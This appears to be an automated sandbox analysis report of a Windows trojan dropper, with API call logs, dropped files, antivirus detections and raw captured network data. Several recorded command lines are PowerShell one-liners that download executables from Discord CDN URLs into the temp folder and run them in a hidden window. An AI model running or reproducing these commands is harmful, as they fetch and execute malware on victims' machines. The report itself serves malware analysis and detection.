NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 86016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91ed2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:18 p.m.	process_identifier: 1944 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91dbb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:19 p.m.	process_identifier: 2792 region_size: 2555904 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000029c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 24, 2021, 12:19 p.m.	process_identifier: 2792 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002bb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:19 p.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1541000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:19 p.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef17be000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:19 p.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef17be000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:19 p.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef17bf000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:19 p.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef17bf000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Aug. 24, 2021, 12:19 p.m.	process_identifier: 2792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef17bf000 process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\88448ef6-b35e-4485-b602-2a0409015a38\Module.dll
file	C:\Users\test22\AppData\Local\Temp\WindowsHost.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (6 events)

cmdline	powershell Start-Process -FilePath 'C:\Users\test22\AppData\Local\Temp\\WindowsHost.exe'
cmdline	"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/861164404162035735/877165641059139624/WindowsHost.exe', '%Temp%\\WindowsHost.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/861164404162035735/877245844057899028/WindowsHelper.exe', '%Temp%\\WindowsHelper.exe') & powershell Start-Process -FilePath '%Temp%\\WindowsHost.exe' & powershell Start-Process -FilePath '%Temp%\\WindowsHelper.exe' & exit
cmdline	powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/861164404162035735/877165641059139624/WindowsHost.exe', 'C:\Users\test22\AppData\Local\Temp\\WindowsHost.exe')
cmdline	cmd /c powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/861164404162035735/877165641059139624/WindowsHost.exe', '%Temp%\\WindowsHost.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/861164404162035735/877245844057899028/WindowsHelper.exe', '%Temp%\\WindowsHelper.exe') & powershell Start-Process -FilePath '%Temp%\\WindowsHost.exe' & powershell Start-Process -FilePath '%Temp%\\WindowsHelper.exe' & exit
cmdline	powershell Start-Process -FilePath 'C:\Users\test22\AppData\Local\Temp\\WindowsHelper.exe'
cmdline	powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/861164404162035735/877245844057899028/WindowsHelper.exe', 'C:\Users\test22\AppData\Local\Temp\\WindowsHelper.exe')

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\WindowsHost.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 24, 2021, 12:19 p.m.	show_type: 0 filepath_r: cmd parameters: /c powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/861164404162035735/877165641059139624/WindowsHost.exe', '%Temp%\\WindowsHost.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/861164404162035735/877245844057899028/WindowsHelper.exe', '%Temp%\\WindowsHelper.exe') & powershell Start-Process -FilePath '%Temp%\\WindowsHost.exe' & powershell Start-Process -FilePath '%Temp%\\WindowsHelper.exe' & exit filepath: cmd	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 24, 2021, 12:19 p.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (1 event)

section

{u'size_of_data': u'0x00015200', u'virtual_address': u'0x00002000', u'entropy': 7.866953255850268, u'name': u'.text', u'virtual_size': u'0x0001511c'}

entropy

7.86695325585

description

A section with a high entropy has been found

URL downloaded by powershell script (25 events)

Data received	[
Data received	Wa$hNËÉ36ªKÝ@0êÛ¡¦¹¾DOWNGRD \|c6m6ÜÕ¥!Kè kÛÕÑÆ$àåo.¾"MðÕÀÿ
Data received	ò
Data received	î ëI0E0- öX9O÷ÔÀ:D# 0 H÷ 0J10 UUS10U Cloudflare, Inc.1 0UCloudflare Inc RSA CA-20 210119000000Z 220118235959Z0m10 UUS10 UCA10U San Francisco10U Cloudflare, Inc.10Usni.cloudflaressl.com0"0 H÷ 0 ¬Cb6Q;ÓãÂ³Á@k-ÓÕ»ÀÓQbÕËÿ~ôxÚkJ» ©pnVM6ìZ:r¨ùÑàÇoéÏÿ®1ÏH{«èæ}ºfX\ÍO.íäT/Æ qd³Q_Õ ;$xÛFq´CW¤8-Mi$²sÊýä³¢a.ÁÁk³#ùs·5üy 8^¶löeý§:Û§µnZ"À¢5Cq¿mÓßôòý'ø.°ì·ßö_%¼PZTºÄpµ7¿Þ:ü,}Ç±_.Mõl!ñYÊ2}J¯£0þ0U#0©ü²EIÁo04+Ù°%Wz0U8åôÎh §ëf?ßþ5²ÄÇ×0BU;09.discordapp.comsni.cloudflaressl.comdiscordapp.com0Uÿ 0U%0++0{Ut0r07 5 31http://crl3.digicert.com/CloudflareIncRSACA-2.crl07 5 31http://crl4.digicert.com/CloudflareIncRSACA-2.crl0>U 70503g0)0'+http://www.digicert.com/CPS0v+j0h0$+0http://ocsp.digicert.com0@+04http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0Uÿ00 +Öyõòðv)y¾ð99!ðVsc¥wå¾W}` øùM]&\%]Çwp®ûG0E!å¦v£}¦Â¿¦þïµ.¤>@Tg.Ý{ (AèV<'ûÇ¼z°ú5"eÈ{L(`?` üë,/Ev"EEYU$V?¡/ñ÷mà#&cÀK]Æ\nâwp¯QG0E Ò6W\îãhj9ô}xaè^<?T¨\|$%îÞ!ºÝlÂR:nnãóý?®ª¡ÜGRÚ¯x!ù10 H÷ »ÿ-2ß)_/¼X"Kùo¬ó?I÷\|¬eB)ÌÒõ\|ðïÙ2AKBÓtxs¶9WÜbÙÝWªiñÜËÙAARâY¿´þ^ÀûÚ«²ÀpQHÝ7ø¤HXëê="¬Ô!beÉ¼lÝ§L+û# ýHñ´{©YkM[äÈTWgÁ(q®_ô°y0èàßj²Qw@µu¸71ÓYEº:¹V¶Iª§~-øPíìd05ÌRÌ_yCq^ÌÁ£ftÆ¼¼è¼\|u+uN¹X~8?ÑÙHOlKB¿\|W2ôýa×é00 Øsó³¸Ú[X8)0 H÷ 0Z10 UIE10U Baltimore10U CyberTrust1"0 UBaltimore CyberTrust Root0 200127124639Z 241231235959Z0J10 UUS10U Cloudflare, Inc.1 0UCloudflare Inc RSA CA-20"0 H÷ 0 µ]&È «±3]²Â1N~_Æo$íÚ®¾ç÷ÅÏTf8(èæi»ø1jVõèÁ¥èYè³à:a(°~Í ýÎ7Ãé©ÉxÊ¦`F¯t-OÚè RÈZ2Ï!!G\ªÀp±ñÞß-©ì[W99¾Âï×¶,J?ÑÖ³!¢O%,B#}×³Öi¯ÕªØhdãR/Ååô¯å ÙFçÏ2"ð7ÄýæâÌ:H×a¿=rÙp^ì i$â<HãþÓåQÔ+À¡Op¿·Òni-ÈÍ¢bLC7_:vZúni]ÅÁ£h0d0U©ü²EIÁo04+Ù°%Wz0U#0åY0GXÌ¬úT6{:µMð0Uÿ0U%0++0Uÿ0ÿ04+(0&0$+0http://ocsp.digicert.com0:U3010/ - +)http://crl3.digicert.com/Omniroot2025.crl0mU f0d07 `Hýl00(+https://www.digicert.com/CPS0 `Hýl0g0g0g0 H÷ \|°¦dráaÝót=P§çÂN&+Açð°óòÒçPÒÆ©ºë¾ÁÁøO¼\|ær/é¶ÆviÝòjGkT¤ 5'ÝÈÓ´àÚ¦ðçÏæÒËÚ"wØI¨UÔÒÎÐèÚàBýÎ~Ê§Ã')¼ÿí.4ýF*ïNV\|èÜ"íS [º{àòO¥YAÍ³r.\ozJC+"ËÔ? \|óú\|ÛJsqéÕÝF¶qßõP~3Ò5u$^Z¨Eô´Ø¦±déûùeHöÃF~Z0S]4âòñðøã
Data received	K
Data received	GA2`À³\ ÐNPqÜ{æËlYã ÄaÙôÑçG±ºÒÎý¡Þ&)TàoÒ¾4ð)Û3oßL+s,§k¶¯Ds("aÕ, 4[¸ØËÓ·÷Æ½.´sº² -T.ÁmÛe8¬~fG7Ì>_MÚFQO¡{àä¬µQiÏbÛP£ Û¹ÐÀÔ¿àÕ+>ù MáÅU¹Ìc¼½K¸$A±þyÝ&ÚÆ¤äÙäèâÏûøÓ)%iÌAÚU~þ91Ö$²Zµ÷¿¦E²oÓWpµBÛ<ó}21L(t2 9V$¥;muçoT·S ÎõR;sðVªÀJ0ÃÖª¸Fÿ°«l /Ò~Ü·Ã³DK}çjW#îV
Data received
Data received
Data received
Data received
Data received	0
Data received	rtQ±ÌY8Ó3áÊÖìDÒïo4²òµ·×ÊÚ]ÙÌ"ojÝ2*
Data received	p
Data received	IrG° jêÝÆ¼¯ßpTÁw¾.=09gAOäèæóE±W¶D>Èü» 'g³rM'd`ghl¿«¾Ù@1Ïa®¯©¡½=YÍÞæ#+«ªÇM÷¹q#h63QôÏ`ñ5a÷iÜFeÒ¬ê:å§ìÝ»hÏÁ»ì;eZ¦Õ¸WJ;âAíD¸D_ u$úExFog±£ÝGf¿ñòáëÑsÎáen&5\zøë«Û¾;ðü¨2ÁÔÛßz¨l)p.²¸§XÚ_Ú//Ù,w.½¼;¹¨xïøû%ÓµTôG$úèLè·þéubÝÉAMiäÝËî£{gLÀº~ÖU«bÛÏùºÂÒÊ3«~¢Þ`lGF¦#ZXôi=±kîdt¢IÂOÝ RL¹[7þc°kÄSÞ}Ãcüm XêG¥³£nÈ+WQRó¦ PÜA«Ø±! Ùçâ~Ê]fGh<{EX÷gpO°o¦¨C¸²Ö7å»fzúÿÐûú8XPp öBÁlØÀ!o$ì9XÏçrj´ ,æ¶³\|É½éÂ2°´f7i>ÕjHTî=Ì<CÀé®5ÀæsÃ@ôä8xök£]¨¬¡²ë Q$ îg])çFïp±ÄvÎBt´'HQpI .ép\|QuÐ Ñùâbº+9ZÜÑyªãFà«X$$«\ MC¶frg6Ñú¤\|¼i²D¿gUZGÃYöÎíßÎv+ y _[ýoôßú+?ÞUè¹'swy@ÔÙË õÊÄÂVùRbµ6º#-EùèÊ7ÎØ?.Û= !¼Åo.û0ßëZÚ; $Â½T5®@F'³v`4á%'wß;g®Ët¦s¨/¯²å¦Z9'0Ã,iówvÁ^d?¼ô¾ ;J£ðªèq1â`»sÎ!ÔH6E){ßþp÷ÎïL»§ºg!5¢bL¥Ýiµéíµø7ý¸åLÀ¾£îÓEÞQC ëaçéÝÜFZwícú£Ò!mÏÏ1<QT+sÅïÊýç`ppgüÃÜM-0ÃUßxI\VfÖHñVs]'j`Z×Kc_¹ßè3eØ¯fh¬uò HÚ½´ÍçÝp¹³R\|E÷Yû¤ÐÂ-U}üRòìgehÚwèá¼áq¬JÌWÏÌÍç×¨ÝôBÆÞXÙ1?Ð¹1z´Èê×àï+ªFxUlYÎ^ÌÔy-ÃMmy%ä{ýóPc@uÔ\|1Ðº¶[Ôá$åª~,uB± 8ÕV/hK[Ý <²à¿ÀrAú7¤ÒÖÐÔû.l4P"¹@ÀíÏGki¢%ÚÓ-`È!¾$5YIãÝõ_óÙîq>íJºÂèUiý¶VÖphÚvõÞêJe{68ú<îi¾ÁXÕ´¦ú?zdSd¨fJ-<Çßä¨uß WÊPbëaF^ûZo(HWâ}W&êÿ¢ø*°Aø±"GÇ¸//nÜäÄY5tÄ`W]í£ÓÄãÒ ÀJJiåájÒ9¿Pþöa¡
Data received	´ÏWL¢óMõT5ãG&©òë3:N½Å¾«êÑ_´ýÑ b>ÔØ¨å¼&@±Húñ¶ú°Ï¡~¤°ÊÅZN&d®ûnAi4Â¤ø·Û¡1Ë]§ýXÊÁR×Ä$ní9÷ÛÛ¯»Øhç¿¶Ù],@²ë%SöBX#ó"{gý§N6ëÍÁÇMooZ×v I÷[Ñ RnÃu6yb`¯tª²%R±Ö9>{¨èèyVöþ«MFöËL6ýÝcoé¹´2ªwýe±Ð\|ïvØ0J´ÅÞ\w!)ÈÍqrG#Ö÷mW¥Ö%pãÙµcoñóY<6T ¿wG(¹{ ²¶{!û½Ý©¶G7ùÞ¶G@¶A6´YÇD¯fÏOò8å X:µ¯vÅÞ@$_¥û£s¯"xß!©«m>4$NÆ[K§ïÂEBü³,\¿ Åø¨{i²¯`(PªrþÔDÄìÞäÉ^¥rÃ°MV&ÕÐmCæ)MSnpÔªNÏÜ¾ôÀß^¾¸æúrN0À8$ù©Ç}ãý¢(¥Ìj9{xyDMÑKË>PìøÉ8ÙJ*Ûi"íW?RW¯ü÷îTÕ§Ú4§¥DL,u½Ò°Ö{Û]V#5Î!íÕNÞa\|c"Q+³òðb¹¬÷=z3t\ÌZdß"j1qØegÄÙÑ2 çCÑ)®ñî):p7²N>4CëÈÆµI±jvbD7G«³\|ÑÎzYGm=ôhû¼ùÿv¢ToÚð¢wÑÁj2uâ0ÖØ+ì!¶xsf¬,¸HaàOP&UEÅú ²6Wû¡¢:²FCæ9ï³XlÌüøV"Î38?µv ÜYÓsXëú³5ÍÞb¡¬áì+²££~AuÅ vþ^i8&./ñY°¡øeï®¶KgQu ÖõÆiJïÝÎê_&DûîF."fû~-#;@2êÍ Y[ÜÊLk£BIîü¹hUs1Éç~§Iºj8ØÚ·;bNeä2=ªjfruÓúÁHÃþ«n1]»xÃz!¶/dÕÒg42w)<Ùßßýjsã7.¡ÿÉ0÷i§JE¤PðEå ¢GÎÝåèpéü¨."¢§÷®þmFrJ¦G¤ É§Äg%C,\|««Ì#Ö÷n+ààñ36=Í`]`óQ^×Ò']wAÐì=ÅÙ]d+®Fé¿±Åz-o¸é6)üjÐWÅlø\|êx¾]hIëÁ#Év#¸ÀöÒÈáá?ÞhÓW.¾`ÐÍ®¨&^0~0wWé;ïÛ4KÖÜ\SÑ â6~Â®=.4Dûºð6ªûg9ýò½ôÿ ú@ô=Ô:q°í ¸þÿICÃ £Üz¢¯ 5Ã©àWömºë£èÔìúîÙ)o:L¦X¼âÜýh}¶McU¹ö÷"Fª¬çÆ=g3ÃÃ1Ëðý×«óYUìfz¼ÞîÙ×S`i=Oãoð7&Ã/uíi÷7¤v·8r§ æ#]üµG¹a¹ ÑZev±U/lCV sÝVÓ>6´H¦hÍNë}b$áFàù3$ß½ÜÝ0æE07Bëèm
Data received	0KF^v>'óIébøYMÈëéö¡´jOÜ®Ù¶ºvÅå´KÎ &÷3¦á¬ua¯6£¥c>)¬?:xÐÊY£Ò®s® Ö¦õZ(b¦IxZ >:ùüÂ÷7×7qhccÖÀôà)h-Z®Uab+ªu×Jr,6È] 4opJs\|¥{ô´=8y<" Zñÿ<®Kªp[ÿPMDk;d¥ÛÄWr$¡°i(õ4«S#ýws»É¸íÉ^Ê'ÙåãÔ÷zè7i&&&¦Ðe5z"y:´%°ÝÙq ¥ [zî1ËîaâÖZÚàÈ #X g¸P ´"Ê0cvÞaÝã&^Õ"Â~pÙ]'ÔjÔÖÌ~×¿¬Ã·Ç^òJT^èybv¼sþuiÜÑgÏÒþÂ7²DÊ½ Cdua?6wÈkFùT~¼Ì¶mÐ«ÈLØÛP-¢Ì{<(Î];q¥Ã¯(°¼`ÒÅ»Ç?rhi ¥ñ¸ÔT¨±0ÈzQ¿AG£(Å Jåã7ï;ñpöü©êáP¹.?,³¿¥-òI¨V-åÙRÞIÇò8êú2Sb+¯}Ý°i+QìÎÕ^äDI7¨ó"¤¤þè¼ëTÁX-Àû¦Ä´\S4Tÿ·Ø À÷ #rCý³î¸Îª?Ù/t0} tú´øù»uËcÌ_Ø7«Pà²¾ñ¯ ú¥å»ÑÁÜÚÅ×uwµLx¬1ÍæbQnëÛçâ@¾P ¬Íh@Ô4ñx/ì¤kñã!ÁÝÿ¬[)D4º8l³Z'ä)ùù!÷diífZD}ÑÀa§YÇíñG¨Ñ¸Ìö9¹ñß¶§®ú°f°«QøU®RëÑ»ß~¿]¸´(DD~pÜ!µÞlÚ7McEË}? ì<Ó8yHß÷f¦ÏÛsQkçÍ$wNmÕ²«ÒÉÅi4ül+ÍZßGuo]vqÿ@ÇúÂ6äÏkX6ã>ö®}(Æ·c}'ÁÒáD9øÐÍÄ×7EEÒ)£ð,ô"ÿ¾1k=÷s¬¼ZÂ¿í^õn[¶ÿï<è·Àà°[×$ìàeLÞ¡BTª=CÊx¸³øy¬u:uõ/¯¬þR$3Ý½9õuØl-9¹0ÿ(´KÖ_[¥NÓ¤E×;ÈP=Ë(·¿éC¦ÏÁ¡¶Æfw®>ÛÄ)ô}lQÝNqD#Â÷}Ñ'{;£dþïð`9¸¾÷à\:=±¿7rQm*,¸Õ5\|Í²ÅUköRU ú+\|g°NOU)}Ã XØ]<Zgÿ8¿«ÀrÐöE¸è`Ël?BºýÅä.¶àa²u,qCfköX_âäpµJdiË L>UÑ4ÿJËl&S¯Oi:Ëd¦Ý6CüûÈFÛvïC=k¢ÊUhfÂÐ½3<"æÓïç:?gIDø{¹3ä=Õ¥ÜâXIr/{è9M¼§ºÛAÑ0È&ùÓÜØB:æQHÈ¶iãC÷Ñ»áOíóMÀìäÜåq0êä~Ùú³ªÛÎ8gÚFÓ.¨Gü ^Uzô½ÃUí¬3Rw¼V½`0`-]²Xó¡o ÇõrÃ&oà±EèïV
Data received	`
Data received	ÛA,ááó·tUùþéU3Â²Y\|ænå'¢u~ö¡&>]KÂnW½äö 7¦ ½3¨jo=i¢Àå©ÌFº¯üví AM¥ºþqz½¨ æC¥T°!,%½L³¢®·?çleúà!.sÙä¬A?9L @}7Réõ¤n2G~v5ÿ6ô(ò8tÎh§q{wúÚ{ÀÀ¿¥D##mb_I¿$,¨#t¨ëØàáæÙoÂ#;,6j¹ì»©´÷XBãÌ©ã÷JøüOMìGJúj£=Oç8mIdõ¶Ihü¯àû2ðÍ¶E»ö»N>ñZÏXI>ùêHu_Ø¿ÄvïTwCà«Ý»¹ÔwØ :/înà21³ÕÜó_/eîgË©WL¾dÿ¬Ñ°ÁÝ§J p5Õ¸Ù¾0;{RØ÷á²ûL^ÔBÓ¥# Î^¨ÃGä-²ï³äÇÒ¨Çä-ÅºÄÃ¤kñsy¸?ªöOÁäÄ¥ øKñ8âel¸þ°¢`.GR Ôâm,èöáIoBuy¨Ø¸jI£óCuÜ[ø¢-R'3¸Pò¡9+dl$dÔ'HÕü è;À8Ìã¹8õ s´"x&{ú=ðÌVÌqÉJñá=týrßb³ÄüÐÌP¡»¾Óñæ5ZMh¤ò¼Ñ¦¸¥Eê\È!è³iâÈÕ'wëkõAiz hè¯ótè÷¥TÕ§&¹>¤Pr=éIå#VpwvÊrÉèÕdÞHÜ·#ïHk_UñõîSl±º²ãËqXd£éHÝPçFo»]Òp½)ÑA'Àl¶SOjäO\|Ø#S3;_Q§ eônN³Jß§2.KhËêÉÃêAd`p{ïi¼1ôÛ¥Ix¼-+ýÜ·ÜêL)ýXRâ¡rn@§-à@E;rFêbh÷0äídì»ãÑß½íßbÆÁskFv<Þ¹ãçý'Ôéù0ò6pÌ¢3jC7Bç´ÎATwJñhÍ®OéU\Ú¥õJ©ÙêÄ¬7Î8ä×¿¡¹5³ñÛôþê7:Â,~2y"ò°Écß?gìfSËÈ$ó;GÎn%ÓVZFØ¤=¼ÌÕÒºmÉAZñbB0pXe`uZiÒî7mÚ ÷Ö²al~NÏ£½ÇTÏlHñö_is³ïëBü<ÏkÇ¬¬ÑsmÒ2§2`ò4À) Ópì¨¬SÒe p
Data received
Data received	f¡¦;çlp(ÑTs½øþKµÁNG¹,åé
Data received	Wa$hlÒ³¡U4`{°üÑ¸ä_'K>DOWNGRD jj ¢DìçÿóíõþóL³¹Ïº¦UÜÀÿ
Data received	GA§d%Ö)Æ:xÎ»xXLÐå. svH&V¤jEf5´ñ='Hj$2KéÐÊ·X×¨qâÚtù{Ýñâ.Í¡Y¢làßÅö½v,qî£ »f(Rþ¥ÉÖ²3 ³îGO²9Û®{\¦1iE»çæ~Qî9Û8úUk2ñTÃ£uN<,p3B\Èb%7eÏÈóõÀ°ìãÀ O<çìIu%XwU_O©¨µcø°B# õÌíRu zeNó;V¥é«Z×Î«Ùûü$à 1%y²×y1Ì°IìÍovçÇÒðuÅRîÅÈ{Ê§·ÈªãØvgÛ7ýeMvWRO·]<ã®ÉWeÄ/l´cóÊÙ
Data received	_¹¿]ãì<þ ax=P£·)\|TmÖdÏ¸êäaöÒa9¡«iWÞæ¯5
Data received
Data received	\|78/§^+©$[Ü ]3d¬JM%Ë¯.LÉCFÑöqLtäHÅGÍf¾§Î´`$mÃ7#¯J¥s;5ÂÆù¯µð6´²¦yèIáf#ZôILÅ?"IVÇHÞ²bCê¼{Åtµq%øZÃ9Lý1Ó0þ¨}7½ÑÐ´è½Ò é]ïs±a«uRÈäIRuÙ[£ôÑ{ûùÄÒNß_¯¸Yç7/²Íß_ùé:ùÚñòZ'\hãcfñù¨sÑ<â`c¥MÂýCïÇÚ VöÕQt)8g[2 üMupK;ü¦W#OæÞÙ²gþóÙSÆíÐÇ¨ßm.ýÇo7ü;ÞÅ«t2»Àù¤}qp.\|çÂ!l9N0C¿ò£¬åËÕ8~W lHCkç V¶©ÄB3P6¾¶æ)é(¤¤xW³E÷Q '¬ïywå±ðäNõáÛj÷¨;MQÅçg÷}n«ý-VM½~ØN²Ä7(Î¼ÈÙÝÛÙKÁJÔÚ íÌèdùdPe·¢Â ØLqJÞÆÈåU¡µðiq¾æã!n/zvÀrùBÁ^ÊP"~¦vÔøÐöcôÜ^ºÑ÷¨ïÇ³lé=náÉàÐbÒåt%ó½¤HI}Ç¹öÒ¾â½R¤Òº~TN.§©Ô°Ç³ã»CÖ~7úÿòðìûü"òÿ<âZ =w×Þ£µ)ÃJò~ý uµÍÅrDY 3N)¬g5,åÌ´Ðªn`Û·AÛ_§bÂ¶ò!MáÓg³¶Äã´°iÄðOAqz!MñxÑ± Í§;ìMúz%n¤±~k<q7¦3Úì+¡¨l÷ãt4,Ñusé¬¦ÈQ¤Ïù ¡0oh8tùxFïsR1~ðÀÇu]Êól.¦7nÜùðnN S»ÐÊîúfØÜ×7+ ½³çBÙòóW#åÏ`«{.'l×¿m·ám³òã÷.ø Ñ.ü÷²Teó-æùÈjôÁn?ÔÍ¢TçÑÈ£ ³ÂyÚáaêÅæ<.húnkCgÎÌ]O\| óÒß&¹qRw,cQovZ-á×aìúnÌ^¤'å¦iNµz'ò¯åA5 PQÀëøü}ã¼NOdqã3K"ÔZÙ¯ísÝï5¢0F&ÿ¦ìæ{ÃØåUÅbgè¡Î>¨U]Z,¯j[«úÃ>ë¯÷{oéõ?ÂjÒ÷¥ Ümbü<ò>aW^ÚPÇHðÄxªÚj2ÄÌ\0$lim¸FØàÍù0È®7¶.Áng5f>fá,5Rã~gOq43þ}hê!EÊ{Qü²úÚd£}}äSpÙYÞ&K5Q uæÅ£Ïe×´Ü]Â©Z³Çh SýÏ;Ò×ÿ2Dæ&w¸NQi _ÕÃ.$¼u,éÕÅÖ OkÀüÑÏÑÛztöe Êâø¤=Ë`+ö¦ô\^îxnÄ^4á\|æ

Poweshell is sending data to a remote host (6 events)

Data sent	uqa$hNä,c 8¿´¾þ& £ë>ì ÖQüZ/5 ÀÀÀ À 280ÿcdn.discordapp.com
Data sent	FBAûtýgcîtsôÀØèj_áT<@¡ký[_ß7zîf.t²BHÉo 'Äle©::ë¾»ß0OñÄÙ1+!9dÊËiÌ¢8ÏØòe'þXÅÙa*.À¤0´?Ìæ
Data sent	ñbüüý¢Ô¼M§Õ¸L¯¾¯}Ín\[n×Ð-jáºÑA8¼jrX&+;GÆüÐ=²K©ÇµpÁT.¨UD «Þ¬´íªMÈÄàÄ1ÉÉ8Wøb3%D?ñ=»¢":åhKø¼I8wëýÁËé=\|ãºË×Á"úß¡aÔ{§ ü}
Data sent	uqa$hlÖ~ðwô¬@C3òBPW ¤Í0øZ/5 ÀÀÀ À 280ÿcdn.discordapp.com
Data sent	FBAòþ¢e÷¥ÇAØúNZ¶÷¼ý9-Ê>vhô_¢rÊå`z¼Pn8;â{ÇÏ)1ðÞ^0ÑN³¨J ^Óì\¼£ËgÜäÀ^¸±H7Ï_±û&Ic¡¨ìÄ
Data sent	§ÌÖgó<9>cËyÁt^Ó3 À7ì·Ê_(ËÜ>)&½%â¥ôôÐ×Oh´%æËþÌ Å}9240<hèÝÌØî¤¿ÔâÜlåUo`VÌ;ÛÛ<u8£b¢zgMRrÕt,2?íg¨&+7vÒQ<À¸Ûr ùí=E4¹(²¼£Ñìi\µ6û

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Aug. 24, 2021, 12:19 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 24, 2021, 12:25 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 24, 2021, 12:26 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 24, 2021, 12:26 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Communicates with host for which no DNS query was performed (1 event)

host

172.67.188.154

File has been identified by 16 AntiVirus engines on VirusTotal as malicious (16 events)

Elastic	malicious (high confidence)
FireEye	Generic.mg.abad27b663c16a74
Sangfor	Trojan.Win32.Save.a
Cybereason	malicious.ac844a
BitDefenderTheta	Gen:NN.ZemsilF.34088.8m1@a8Z9ksnO
Paloalto	generic.ml
Kaspersky	UDS:DangerousObject.Multi.Generic
Sophos	Mal/Generic-R
MaxSecure	Trojan.Malware.300983.susgen
Microsoft	Trojan:Win32/Wacatac.B!ml
ZoneAlarm	UDS:DangerousObject.Multi.Generic
Malwarebytes	Malware.AI.1980475579
SentinelOne	Static AI - Malicious PE
eGambit	PE.Heur.InvalidSig
Fortinet	W32/Malicious_Behavior.VEX
CrowdStrike	win/malicious_confidence_90% (W)

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (6 events)

Time & API	Arguments	Status	Return
send Aug. 24, 2021, 12:19 p.m.	buffer: uqa$hNä,c 8¿´¾þ& £ë>ì ÖQüZ/5 ÀÀÀ À 280ÿcdn.discordapp.com socket: 1260 sent: 122	1	122
send Aug. 24, 2021, 12:19 p.m.	buffer: FBAûtýgcîtsôÀØèj_áT<@¡ký[_ß7zîf.t²BHÉo 'Äle©::ë¾»ß0OñÄÙ1+!9dÊËiÌ¢8ÏØòe'þXÅÙa*.À¤0´?Ìæ socket: 1260 sent: 134	1	134
send Aug. 24, 2021, 12:19 p.m.	buffer: ñbüüý¢Ô¼M§Õ¸L¯¾¯}Ín\[n×Ð-jáºÑA8¼jrX&+;GÆüÐ=²K©ÇµpÁT.¨UD «Þ¬´íªMÈÄàÄ1ÉÉ8Wøb3%D?ñ=»¢":åhKø¼I8wëýÁËé=\|ãºË×Á"úß¡aÔ{§ ü} socket: 1260 sent: 165	1	165
send Aug. 24, 2021, 12:25 p.m.	buffer: uqa$hlÖ~ðwô¬@C3òBPW ¤Í0øZ/5 ÀÀÀ À 280ÿcdn.discordapp.com socket: 1280 sent: 122	1	122
